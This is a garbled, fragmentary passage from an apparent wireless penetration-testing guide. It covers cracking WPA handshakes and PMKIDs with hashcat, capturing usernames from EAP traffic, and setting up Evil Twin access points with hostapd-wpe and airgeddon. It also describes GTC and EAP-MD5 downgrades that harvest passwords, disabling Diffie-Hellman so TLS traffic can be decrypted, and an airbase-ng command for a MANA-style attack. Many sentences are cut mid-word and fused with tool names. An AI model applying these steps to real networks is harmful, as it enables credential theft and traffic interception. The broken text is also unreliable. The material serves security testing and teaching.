Robust Security Network, which includes something called
PMKis the same one obtained from a full 4-way handshake, this is all hashcat needs in order to crack the PSK and recover the passphrase! Description obtained from here.
hcxdumptoolalso capture handshakes (something like this will appear:
MP:M1M2 RC:63258 EAPOLTIME:17091). You could transform the handshakes to hashcat/john format using
airodump-ngappears some handshake information this means that the handshake was captured and you can stop listening:
airodump-ngsomething like this:
airodump-nginside a channel and
wiresharkin the same interface) and filter the packets by
eapol. Inside the "Response, Identity" packet, the username of the client will appear.
In this example, all users will share the pseudo-user-name “anonymous”. The first hop RADIUS server is an EAP-PEAP or EAP-TTLS server which drives the server end of the PEAP or TTLS protocol. The inner (protected) authentication type will then be either handled locally or proxied to a remote (home) RADIUS server.
In this example, users belonging to different realms hide their own identity but indicate which realm they belong to so that the first hop RADIUS server may proxy the EAP-PEAP or EAP-TTLS requests to RADIUS servers in their home realms which will act as the PEAP or TTLS server. The first hop server acts purely as a RADIUS relay node.Alternatively, the first hop server may act as the EAP-PEAP or EAP-TTLS server and either process the protected authentication method or proxy it to another server. This option may be used to configure different policies for different realms.
ifconfig -acheck that the wlan interface to create the AP and the interface connected to the Internet are present.
Options: 5,6,7,8,9 (inside Evil Twin attack menu).
hostapd-wpeneeds a configuration file to work. To automate the generation if these configurations you could use https://github.com/WJDigby/apd_launchpad (download the python file inside /etc/hostapd-wpe/)
--negotiate gtc-downgradeto use highly efficient GTC downgrade implementation (plaintext passwords)
--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAPto specify manually the methods offered (offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect).
Airgeddoncan use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to capture the user and the MD5 of the password. Later, the attacker can try to crack the password.
Airggedonoffers you the possibility of a continuous Evil Twin attack (noisy) or only create the Evil Attack until someone connects (smooth).
#dh_file=/etc/hostapd-wpe/certs/dh) This will make
hostapd-wpeto exchange keys using RSA instead of DH, so you will be able to decrypt the traffic later knowing the servers private key.
hostapd-wpewith that modified configuration as usual. Also, start
wiresharkin the interface which is performing the Evil Twin attack.
Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...
--loudto create a Loud MANA + Known beacons attack):
airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0